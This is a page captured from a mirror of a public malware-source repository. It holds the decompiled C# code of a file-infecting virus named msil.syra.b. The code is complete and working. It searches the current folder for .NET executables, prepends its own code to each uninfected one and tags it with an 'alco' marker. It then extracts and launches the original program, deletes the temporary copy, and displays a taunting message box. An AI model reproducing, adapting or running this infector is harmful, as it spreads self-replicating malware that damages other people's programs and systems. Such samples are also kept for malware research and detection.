mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
139 lines
4.4 KiB
C#
139 lines
4.4 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
|
// Type: msil_syra_by_alcopaul
|
|||
|
|
// Assembly: syra.b, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
|
// MVID: 9CFE773D-27F0-436F-8F51-313FF31C4F0C
|
|||
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.Win32.HLLP.Flatei.d-530621cdc88ae9ee0fcdea85f02fdf94885c1884f085b4dc62ccea10a89aa4d9.exe
|
|||
|
|
|
|||
|
|
using System.IO;
|
|||
|
|
using System.Reflection;
|
|||
|
|
using System.Runtime.InteropServices;
|
|||
|
|
|
|||
|
|
internal class msil_syra_by_alcopaul
|
|||
|
|
{
|
|||
|
|
public static void Main(string[] args)
|
|||
|
|
{
|
|||
|
|
Module module = Assembly.GetExecutingAssembly().GetModules()[0];
|
|||
|
|
foreach (string file in Directory.GetFiles(Directory.GetCurrentDirectory(), "*.exe"))
|
|||
|
|
{
|
|||
|
|
try
|
|||
|
|
{
|
|||
|
|
AssemblyName.GetAssemblyName(file);
|
|||
|
|
FileStream fileStream = new FileStream(file, FileMode.OpenOrCreate, FileAccess.Read);
|
|||
|
|
StreamReader streamReader = new StreamReader((Stream) fileStream);
|
|||
|
|
int offset = (int) fileStream.Length - 4;
|
|||
|
|
streamReader.BaseStream.Seek((long) offset, SeekOrigin.Begin);
|
|||
|
|
string str1 = streamReader.ReadLine();
|
|||
|
|
streamReader.Close();
|
|||
|
|
string str2 = "alco";
|
|||
|
|
if (!(str1 == str2))
|
|||
|
|
{
|
|||
|
|
if (!(file == module.FullyQualifiedName))
|
|||
|
|
{
|
|||
|
|
try
|
|||
|
|
{
|
|||
|
|
msil_syra_by_alcopaul.Infect(file);
|
|||
|
|
break;
|
|||
|
|
}
|
|||
|
|
catch
|
|||
|
|
{
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
catch
|
|||
|
|
{
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
FileStream input = new FileStream(module.FullyQualifiedName, FileMode.OpenOrCreate, FileAccess.Read);
|
|||
|
|
BinaryReader binaryReader = new BinaryReader((Stream) input);
|
|||
|
|
int length = (int) input.Length - 5120;
|
|||
|
|
binaryReader.BaseStream.Seek(5120L, SeekOrigin.Begin);
|
|||
|
|
byte[] buffer = new byte[(int) checked ((uint) length)];
|
|||
|
|
int count = length;
|
|||
|
|
int index = 0;
|
|||
|
|
int num;
|
|||
|
|
for (; count > 0; count -= num)
|
|||
|
|
{
|
|||
|
|
num = binaryReader.Read(buffer, index, count);
|
|||
|
|
if (num != 0)
|
|||
|
|
index += num;
|
|||
|
|
else
|
|||
|
|
break;
|
|||
|
|
}
|
|||
|
|
binaryReader.Close();
|
|||
|
|
BinaryWriter binaryWriter = new BinaryWriter((Stream) new FileStream("_U-.exe", FileMode.OpenOrCreate, FileAccess.Write));
|
|||
|
|
binaryWriter.BaseStream.Seek(0L, SeekOrigin.Begin);
|
|||
|
|
binaryWriter.Write(buffer);
|
|||
|
|
binaryWriter.Close();
|
|||
|
|
msil_syra_by_alcopaul.Win32.ShellExecute(0, (string) null, "_U-.exe", (string) null, Directory.GetCurrentDirectory(), 1);
|
|||
|
|
do
|
|||
|
|
{
|
|||
|
|
try
|
|||
|
|
{
|
|||
|
|
File.Delete("_U-.exe");
|
|||
|
|
}
|
|||
|
|
catch
|
|||
|
|
{
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
while (File.Exists("_U-.exe"));
|
|||
|
|
msil_syra_by_alcopaul.Win32.MessageBox(0, "::: now infecting dotnet files only :P :::", "msil.syra.b by alcopaul", 0U);
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
public static void Infect(string host)
|
|||
|
|
{
|
|||
|
|
BinaryReader binaryReader1 = new BinaryReader((Stream) new FileStream(Assembly.GetExecutingAssembly().GetModules()[0].FullyQualifiedName, FileMode.OpenOrCreate, FileAccess.Read));
|
|||
|
|
binaryReader1.BaseStream.Seek(0L, SeekOrigin.Begin);
|
|||
|
|
byte[] buffer1 = new byte[5120];
|
|||
|
|
int count = 5120;
|
|||
|
|
int index1 = 0;
|
|||
|
|
int num1;
|
|||
|
|
for (; count > 0; count -= num1)
|
|||
|
|
{
|
|||
|
|
num1 = binaryReader1.Read(buffer1, index1, count);
|
|||
|
|
if (num1 != 0)
|
|||
|
|
index1 += num1;
|
|||
|
|
else
|
|||
|
|
break;
|
|||
|
|
}
|
|||
|
|
binaryReader1.Close();
|
|||
|
|
FileStream input = new FileStream(host, FileMode.OpenOrCreate, FileAccess.Read);
|
|||
|
|
BinaryReader binaryReader2 = new BinaryReader((Stream) input);
|
|||
|
|
binaryReader2.BaseStream.Seek(0L, SeekOrigin.Begin);
|
|||
|
|
byte[] buffer2 = new byte[(int) checked ((uint) input.Length)];
|
|||
|
|
int length = (int) input.Length;
|
|||
|
|
int index2 = 0;
|
|||
|
|
int num2;
|
|||
|
|
for (; length > 0; length -= num2)
|
|||
|
|
{
|
|||
|
|
num2 = binaryReader2.Read(buffer2, index2, length);
|
|||
|
|
if (num2 != 0)
|
|||
|
|
index2 += num2;
|
|||
|
|
else
|
|||
|
|
break;
|
|||
|
|
}
|
|||
|
|
binaryReader2.Close();
|
|||
|
|
BinaryWriter binaryWriter = new BinaryWriter((Stream) new FileStream(host, FileMode.OpenOrCreate, FileAccess.Write));
|
|||
|
|
binaryWriter.BaseStream.Seek(0L, SeekOrigin.Begin);
|
|||
|
|
binaryWriter.Write(buffer1);
|
|||
|
|
binaryWriter.Write(buffer2);
|
|||
|
|
binaryWriter.Write("alco");
|
|||
|
|
binaryWriter.Close();
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
public class Win32
|
|||
|
|
{
|
|||
|
|
[DllImport("shell32.dll", CharSet = CharSet.Auto)]
|
|||
|
|
public static extern int ShellExecute(
|
|||
|
|
int hWnd,
|
|||
|
|
string oper,
|
|||
|
|
string file,
|
|||
|
|
string param,
|
|||
|
|
string dir,
|
|||
|
|
int type);
|
|||
|
|
|
|||
|
|
[DllImport("user32.dll", CharSet = CharSet.Auto)]
|
|||
|
|
public static extern int MessageBox(int hWnd, string text, string caption, uint type);
|
|||
|
|
}
|
|||
|
|
}
|